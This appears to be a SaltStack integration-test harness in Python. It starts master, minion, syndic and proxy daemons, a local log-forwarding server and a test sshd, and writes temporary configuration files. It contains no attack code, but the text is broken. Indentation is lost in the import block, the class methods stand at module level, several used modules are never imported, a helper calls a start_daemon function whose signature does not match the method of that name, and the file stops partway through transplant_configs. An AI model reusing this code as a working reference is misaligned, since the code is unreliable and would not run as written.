from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils # Can be removed once get_colors and appendproctitle are moved
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.utils.nb_popen import NonBlockingPopen
from salt.exceptions import SaltClientError
try:
import salt.master
except ImportError:
# Not required for raet tests
pass
# Import 3rd-party libs
import yaml
import msgpack
from salt.ext import six
from salt.ext.six.moves import cStringIO
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
from tornado import gen
from tornado import ioloop
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
# Ports already handed out this run.  Each maps to the socket that reserved
# it (kept open on Linux so the port cannot be handed out twice).
_RUNTESTS_PORTS = {}


def get_unused_localhost_port():
    '''
    Return a random unused port on localhost
    '''
    reserver = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
    reserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    reserver.bind(('127.0.0.1', 0))
    chosen = reserver.getsockname()[1]
    if chosen in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521):
        # These ports are hardcoded in the test configuration
        chosen = get_unused_localhost_port()
        reserver.close()
        return chosen
    darwin = sys.platform.startswith('darwin')
    bsd = 'bsd' in sys.platform
    if darwin and chosen in _RUNTESTS_PORTS:
        # macOS may hand back a port we already reserved; try again.
        chosen = get_unused_localhost_port()
        reserver.close()
        return chosen
    _RUNTESTS_PORTS[chosen] = reserver
    if darwin or bsd:
        # Keeping the socket bound would block the daemons on these
        # platforms, so release it immediately.
        reserver.close()
    return chosen
def close_open_sockets(sockets_dict):
    '''
    Close every socket tracked in *sockets_dict*, emptying it in place.
    '''
    while sockets_dict:
        _, sock = sockets_dict.popitem()
        sock.close()
# Release every reserved port's socket when the test run exits.
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
# Port the log-forwarding socket server (defined below) listens on.
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
    '''
    Same as the stdlib mix-in, but handler threads are daemonic so they
    cannot keep the interpreter alive at shutdown.
    '''
    daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
    '''
    Threaded TCP server exposing a ``shutting_down`` event that request
    handlers poll so they can exit promptly when the server closes.
    '''

    allow_reuse_address = True

    def server_activate(self):
        # (Re)created on activation so each instance starts out "running".
        self.shutting_down = threading.Event()
        # Explicit base-class call (not super()) kept from the original.
        socketserver.TCPServer.server_activate(self)

    def server_close(self):
        # server_close() may run even if server_activate() never did.
        if hasattr(self, 'shutting_down'):
            self.shutting_down.set()
        socketserver.TCPServer.server_close(self)
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
    '''
    Receive msgpack-serialized logging records from the salt daemons and
    replay them through the local logging hierarchy.
    '''
    def handle(self):
        # The Unpacker reassembles msgpack objects that may span several
        # recv() calls.
        unpacker = msgpack.Unpacker(encoding='utf-8')
        while not self.server.shutting_down.is_set():
            try:
                wire_bytes = self.request.recv(1024)
                if not wire_bytes:
                    # Peer closed the connection.
                    break
                unpacker.feed(wire_bytes)
                for record_dict in unpacker:
                    # Rebuild the LogRecord and hand it to the logger it
                    # originally came from.
                    record = logging.makeLogRecord(record_dict)
                    logger = logging.getLogger(record.name)
                    logger.handle(record)
                    del record_dict
            except (EOFError, KeyboardInterrupt, SystemExit):
                break
            except socket.error as exc:
                try:
                    # errno.WSAECONNRESET only exists on Windows.
                    if exc.errno == errno.WSAECONNRESET:
                        # Connection reset on windows
                        break
                except AttributeError:
                    # We're not on windows
                    pass
                log.exception(exc)
            except Exception as exc:
                # Log and keep serving; this handler must not kill the
                # log server thread.
                log.exception(exc)
class TestDaemon(object):
    '''
    Set up the master and minion daemons, and run related cases
    '''
    # Seconds allowed for the test minions to connect to the master and to
    # finish their initial module sync.
    MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
    '''
    Keep a reference to the CLI parser and build the color table used
    for progress output (colors are blanked out on Windows).
    '''
    self.parser = parser
    use_colors = self.parser.options.no_colors is False
    self.colors = salt.utils.get_colors(use_colors)
    if salt.utils.platform.is_windows():
        # There's no shell color support on windows...
        for name in self.colors:
            self.colors[name] = ''
def __enter__(self):
    '''
    Start a master and minion
    '''
    # Setup the multiprocessing logging queue listener
    salt_log_setup.setup_multiprocessing_logging_listener(
        self.master_opts
    )
    # Set up PATH to mockbin
    self._enter_mockbin()
    # Fire up the daemon set matching the requested transport.
    if self.parser.options.transport == 'zeromq':
        self.start_zeromq_daemons()
    elif self.parser.options.transport == 'raet':
        self.start_raet_daemons()
    elif self.parser.options.transport == 'tcp':
        self.start_tcp_daemons()
    self.minion_targets = set(['minion', 'sub_minion'])
    self.pre_setup_minions()
    self.setup_minions()
    if getattr(self.parser.options, 'ssh', False):
        self.prep_ssh()
    # Optionally print a versions/grains report before tests start.
    if self.parser.options.sysinfo:
        try:
            print_header(
                '~~~~~~~ Versions Report ', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            # print_header() without ``width`` support -- fall back.
            print_header('~~~~~~~ Versions Report ', inline=True)
        print('\n'.join(salt.version.versions_report()))
        try:
            print_header(
                '~~~~~~~ Minion Grains Information ', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            print_header('~~~~~~~ Minion Grains Information ', inline=True)
        grains = self.client.cmd('minion', 'grains.items')
        minion_opts = self.minion_opts.copy()
        minion_opts['color'] = self.parser.options.no_colors is False
        salt.output.display_output(grains, 'grains', minion_opts)
    try:
        print_header(
            '=', sep='=', inline=True,
            width=getattr(self.parser.options, 'output_columns', PNUM)
        )
    except TypeError:
        print_header('', sep='=', inline=True)
    try:
        return self
    finally:
        # post_setup_minions() must run even though we return above.
        self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
    '''
    Instantiate ``cls(opts)`` in a child process and invoke its
    *start_fun* method there.  Returns the started Process object.
    '''
    def _bootstrap(daemon_cls, daemon_opts, fun_name):
        # Runs in the child: tag the process title, then block in the
        # daemon's entry point.
        salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, daemon_cls.__name__))
        instance = daemon_cls(daemon_opts)
        getattr(instance, fun_name)()

    proc = multiprocessing.Process(target=_bootstrap,
                                   args=(cls, opts, start_fun))
    proc.start()
    return proc
def _start_daemon_with_status(self, attname, display_name, **start_kwargs):
    '''
    Start a single daemon through ``start_daemon`` while printing the
    usual colored progress messages.

    On success the resulting process object is bound to
    ``self.<attname>``.  On failure (RuntimeWarning/RuntimeError) the
    attribute is deliberately left unset, so callers can keep using
    ``hasattr``/``AttributeError`` checks exactly as before.
    '''
    # Carriage-return blanking string used to overwrite the status line.
    blank_line = '\r{0}\r'.format(
        ' ' * getattr(self.parser.options, 'output_columns', PNUM)
    )
    try:
        sys.stdout.write(
            ' * {0}Starting {1} ... {2}'.format(
                self.colors['LIGHT_YELLOW'], display_name, self.colors['ENDC']
            )
        )
        sys.stdout.flush()
        process = start_daemon(fail_hard=True, start_timeout=30, **start_kwargs)
        setattr(self, attname, process)
        sys.stdout.write(blank_line)
        sys.stdout.write(
            ' * {0}Starting {1} ... STARTED!\n{2}'.format(
                self.colors['LIGHT_GREEN'], display_name, self.colors['ENDC']
            )
        )
        sys.stdout.flush()
    except (RuntimeWarning, RuntimeError):
        sys.stdout.write(blank_line)
        sys.stdout.write(
            ' * {0}Starting {1} ... FAILED!\n{2}'.format(
                self.colors['LIGHT_RED'], display_name, self.colors['ENDC']
            )
        )
        sys.stdout.flush()

def start_zeromq_daemons(self):
    '''
    Fire up the daemons used for zeromq tests
    '''
    # Log records from every daemon are forwarded to this TCP server and
    # re-emitted through the local logging tree.
    self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
    self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
    self.log_server_process.daemon = True
    self.log_server_process.start()
    self._start_daemon_with_status(
        'master_process', 'salt-master',
        daemon_name='salt-master',
        daemon_id=self.master_opts['id'],
        daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
        daemon_cli_script_name='master',
        daemon_config=self.master_opts,
        daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
        daemon_class=SaltMaster,
        bin_dir_path=SCRIPT_DIR)
    # NOTE: daemon_id intentionally uses self.master_opts['id'] for the
    # minions as well -- preserved from the original code.
    self._start_daemon_with_status(
        'minion_process', 'salt-minion',
        daemon_name='salt-minion',
        daemon_id=self.master_opts['id'],
        daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
        daemon_cli_script_name='minion',
        daemon_config=self.minion_opts,
        daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
        daemon_class=SaltMinion,
        bin_dir_path=SCRIPT_DIR)
    self._start_daemon_with_status(
        'sub_minion_process', 'sub salt-minion',
        daemon_name='sub salt-minion',
        daemon_id=self.master_opts['id'],
        daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
        daemon_cli_script_name='minion',
        daemon_config=self.sub_minion_opts,
        daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
        daemon_class=SaltMinion,
        bin_dir_path=SCRIPT_DIR)
    self._start_daemon_with_status(
        'smaster_process', 'syndic salt-master',
        daemon_name='salt-smaster',
        daemon_id=self.syndic_master_opts['id'],
        daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
        daemon_cli_script_name='master',
        daemon_config=self.syndic_master_opts,
        daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
        daemon_class=SaltMaster,
        bin_dir_path=SCRIPT_DIR)
    self._start_daemon_with_status(
        'syndic_process', 'salt-syndic',
        daemon_name='salt-syndic',
        daemon_id=self.syndic_opts['id'],
        daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
        daemon_cli_script_name='syndic',
        daemon_config=self.syndic_opts,
        daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
        daemon_class=SaltSyndic,
        bin_dir_path=SCRIPT_DIR)
    if self.parser.options.proxy:
        # NOTE(review): SaltProxy is not in the imports at the top of this
        # file (only SaltMaster/SaltMinion/SaltSyndic are) -- preserved
        # as-is; confirm it is provided by the wildcard imports.
        self._start_daemon_with_status(
            'proxy_process', 'salt-proxy',
            daemon_name='salt-proxy',
            daemon_id=self.master_opts['id'],
            daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
            daemon_cli_script_name='proxy',
            daemon_config=self.proxy_opts,
            daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
            daemon_class=SaltProxy,
            bin_dir_path=SCRIPT_DIR)
def start_raet_daemons(self):
    '''
    Fire up the raet daemons!
    '''
    # Imported lazily: only needed (and importable) for raet test runs.
    import salt.daemons.flo
    self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster,
                                            self.master_opts,
                                            'start')
    self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
                                            self.minion_opts,
                                            'tune_in')
    self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
                                                self.sub_minion_opts,
                                                'tune_in')
    # Wait for the daemons to all spin up
    time.sleep(5)
    # self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster,
    #                                          self.syndic_master_opts,
    #                                          'start')
    # no raet syndic daemon yet

# The TCP transport reuses the zeromq startup logic unchanged.
start_tcp_daemons = start_zeromq_daemons
@staticmethod
def _remove_files(*paths):
    '''
    Delete each of the given files if it exists.
    '''
    for path in paths:
        if os.path.exists(path):
            os.remove(path)

@staticmethod
def _ssh_keygen(keygen, key_type, bits, filename, cwd):
    '''
    Run ``ssh-keygen`` to create an unencrypted *key_type* key named
    *filename* inside *cwd*.  Prints and returns captured stderr
    (empty/falsy when generation succeeded).
    '''
    proc = subprocess.Popen(
        [keygen, '-t',
         key_type,
         '-b',
         bits,
         '-C',
         '"$(whoami)@$(hostname)-$(date -I)"',
         '-f',
         filename,
         '-P',
         ''],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        close_fds=True,
        cwd=cwd
    )
    _, err = proc.communicate()
    if err:
        print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(err)))
    return err

def prep_ssh(self):
    '''
    Generate keys and start an ssh daemon on an alternate port
    '''
    sys.stdout.write(
        ' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
            'SSH server',
            **self.colors
        )
    )
    keygen = salt.utils.path.which('ssh-keygen')
    sshd = salt.utils.path.which('sshd')
    if not (keygen and sshd):
        print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
        return
    if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
        os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
    # Generate client key
    pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
    priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
    self._remove_files(pub_key_test_file, priv_key_test_file)
    self._ssh_keygen(keygen, 'ecdsa', '521', 'key_test', RUNTIME_VARS.TMP_CONF_DIR)
    sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
    shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
    auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
    # Generate server key
    server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
    if not os.path.exists(server_key_dir):
        os.makedirs(server_key_dir)
    server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
    server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
    server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
    server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
    server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
    # BUG FIX: this previously read 'ssh_host.ed25519_key.pub' (dot instead
    # of underscore), which is not the file ssh-keygen writes, so a stale
    # ed25519 public key was never removed before regeneration.
    server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key.pub')
    self._remove_files(server_dsa_priv_key_file,
                       server_dsa_pub_key_file,
                       server_ecdsa_priv_key_file,
                       server_ecdsa_pub_key_file,
                       server_ed25519_priv_key_file,
                       server_ed25519_pub_key_file)
    keygen_dsa_err = self._ssh_keygen(keygen, 'dsa', '1024', 'ssh_host_dsa_key', server_key_dir)
    keygen_escda_err = self._ssh_keygen(keygen, 'ecdsa', '521', 'ssh_host_ecdsa_key', server_key_dir)
    # NOTE: '-b 521' is preserved for ed25519 for behavioral parity with the
    # original code, even though ssh-keygen ignores the bit size for ed25519.
    keygen_ed25519_err = self._ssh_keygen(keygen, 'ed25519', '521', 'ssh_host_ed25519_key', server_key_dir)
    # Only advertise host keys that were actually generated.
    with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
        ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
        if not keygen_dsa_err:
            ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
        if not keygen_escda_err:
            ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
        if not keygen_ed25519_err:
            ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
    self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
    self.sshd_process = subprocess.Popen(
        [sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        close_fds=True,
        cwd=RUNTIME_VARS.TMP_CONF_DIR
    )
    _, sshd_err = self.sshd_process.communicate()
    if sshd_err:
        print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
    else:
        os.environ['SSH_DAEMON_RUNNING'] = 'True'
    # Install the salt-ssh roster pointing at the generated client key.
    roster_path = os.path.join(FILES, 'conf/_ssh/roster')
    shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
    with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
        roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
        roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
    sys.stdout.write(
        ' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
            **self.colors
        )
    )
@classmethod
def config(cls, role):
    '''
    Return a configuration for a master/minion/syndic.

    Currently these roles are:
        * master
        * minion
        * syndic
        * syndic_master
        * sub_minion
        * proxy
    '''
    configs = RUNTIME_VARS.RUNTIME_CONFIGS
    return configs[role]
@classmethod
def config_location(cls):
    '''
    Directory where the transplanted test configuration files live.
    '''
    return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
    '''
    Return a local client which will be used for example to ping and sync
    the test minions.

    This client is defined as a class attribute because its creation needs
    to be deferred to a latter stage. If created it on `__enter__` like it
    previously was, it would not receive the master events.
    '''
    try:
        return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
    except KeyError:
        local_client = salt.client.get_local_client(mopts=self.master_opts)
        RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = local_client
        return local_client
@classmethod
def transplant_configs(cls, transport='zeromq'):
    '''
    Write the full set of master/minion/syndic/proxy test configurations
    into fresh temporary directories, then parse them back and record the
    results on the class and in RUNTIME_VARS.RUNTIME_CONFIGS.
    '''
    # Start from a clean slate of temporary config directories.
    if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR):
        shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR)
    os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
    os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
    os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
    os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
    print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
    tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
    with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
        known_hosts.write('')
    # This master connects to syndic_master via a syndic
    master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
    master_opts['known_hosts_file'] = tests_known_hosts_file
    master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
    master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
    master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
    master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
    master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master')
    # This is the syndic for master
    # Let's start with a copy of the syndic master configuration
    syndic_opts = copy.deepcopy(master_opts)
    # Let's update with the syndic configuration
    syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
    syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
    syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
    # This minion connects to master
    minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
    minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
    minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
    minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
    minion_opts['root_dir'] = os.path.join(TMP, 'rootdir')
    minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki')
    minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
    minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
    # This sub_minion also connects to master
    sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
    sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache')
    sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
    sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR
    sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
    sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion')
    sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
    sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
    # This is the master of masters
    syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
    syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache')
    syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
    syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR
    syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
    syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master')
    # This proxy connects to master
    # NOTE(review): bare CONF_DIR here (others use RUNTIME_VARS.CONF_DIR);
    # presumably supplied by the wildcard paths import -- confirm.
    proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
    proxy_opts['cachedir'] = os.path.join(TMP, 'rootdir-proxy', 'cache')
    # proxy_opts['user'] = running_tests_user
    proxy_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
    proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
    proxy_opts['pki_dir'] = os.path.join(TMP, 'rootdir-proxy', 'pki')
    proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
    proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
    # Transport-specific overrides.
    if transport == 'raet':
        master_opts['transport'] = 'raet'
        master_opts['raet_port'] = 64506
        minion_opts['transport'] = 'raet'
        minion_opts['raet_port'] = 64510
        sub_minion_opts['transport'] = 'raet'
        sub_minion_opts['raet_port'] = 64520
        # syndic_master_opts['transport'] = 'raet'
    if transport == 'tcp':
        master_opts['transport'] = 'tcp'
        minion_opts['transport'] = 'tcp'
        sub_minion_opts['transport'] = 'tcp'
        syndic_master_opts['transport'] = 'tcp'
        proxy_opts['transport'] = 'tcp'
    # Set up config options that require internal data
    master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
        'base': [os.path.join(FILES, 'pillar', 'base')]
    }
    master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
        'base': [
            os.path.join(FILES, 'file', 'base'),
            # Let's support runtime created files that can be used like:
            #   salt://my-temp-file.txt
            RUNTIME_VARS.TMP_STATE_TREE
        ],
        # Alternate root to test __env__ choices
        'prod': [
            os.path.join(FILES, 'file', 'prod'),
            RUNTIME_VARS.TMP_PRODENV_STATE_TREE
        ]
    }
    master_opts.setdefault('reactor', []).append(
        {
            'salt/minion/*/start': [
                os.path.join(FILES, 'reactor-sync-minion.sls')
            ],
        }
    )
    for opts_dict in (master_opts, syndic_master_opts):
        if 'ext_pillar' not in opts_dict:
            opts_dict['ext_pillar'] = []
        # 'type' vs 'cat' is the platform-specific "print a file" command.
        if salt.utils.platform.is_windows():
            opts_dict['ext_pillar'].append(
                {'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
        else:
            opts_dict['ext_pillar'].append(
                {'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
    for opts_dict in (master_opts, syndic_master_opts):
        # We need to copy the extension modules into the new master root_dir or
        # it will be prefixed by it
        new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
        if not os.path.exists(new_extension_modules_path):
            shutil.copytree(
                os.path.join(
                    INTEGRATION_TEST_DIR, 'files', 'extension_modules'
                ),
                new_extension_modules_path
            )
        opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
    # Point the config values to the correct temporary paths
    for name in ('hosts', 'aliases'):
        optname = '{0}.file'.format(name)
        optname_path = os.path.join(TMP, name)
        master_opts[optname] = optname_path
        minion_opts[optname] = optname_path
        sub_minion_opts[optname] = optname_path
        syndic_opts[optname] = optname_path
        syndic_master_opts[optname] = optname_path
        proxy_opts[optname] = optname_path
    # Each daemon gets its own connection-check port.
    master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
        if 'engines' not in conf:
            conf['engines'] = []
        conf['engines'].append({'salt_runtests': {}})
        if 'engines_dirs' not in conf:
            conf['engines_dirs'] = []
        conf['engines_dirs'].insert(0, ENGINES_DIR)
        if 'log_handlers_dirs' not in conf:
            conf['log_handlers_dirs'] = []
        conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
        conf['runtests_log_port'] = SALT_LOG_PORT
    # ----- Transcribe Configuration ---------------------------------------------------------------------------->
    for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
        if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
            # These have runtime computed values and will be handled
            # differently
            continue
        entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
        if os.path.isfile(entry_path):
            shutil.copy(
                entry_path,
                os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
            )
        elif os.path.isdir(entry_path):
            shutil.copytree(
                entry_path,
                os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
            )
    for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
        # NOTE: relies on the locals above being named exactly '<entry>_opts'.
        computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
        with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
            fp_.write(yaml.dump(computed_config, default_flow_style=False))
    # sub_minion/syndic get their own config dirs, each with a copy of the
    # master config alongside.
    sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
    with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
        wfh.write(
            yaml.dump(sub_minion_computed_config, default_flow_style=False)
        )
    shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
    syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
    with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
        wfh.write(
            yaml.dump(syndic_master_computed_config, default_flow_style=False)
        )
    syndic_computed_config = copy.deepcopy(syndic_opts)
    with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
        wfh.write(
            yaml.dump(syndic_computed_config, default_flow_style=False)
        )
    shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
    # <---- Transcribe Configuration -----------------------------------------------------------------------------
    # ----- Verify Environment ---------------------------------------------------------------------------------->
    # Re-parse the files just written so the recorded opts match exactly
    # what the daemons will load.
    master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
    minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
    syndic_opts = salt.config.syndic_config(
        os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
        os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
    )
    sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
    syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
    proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
    RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
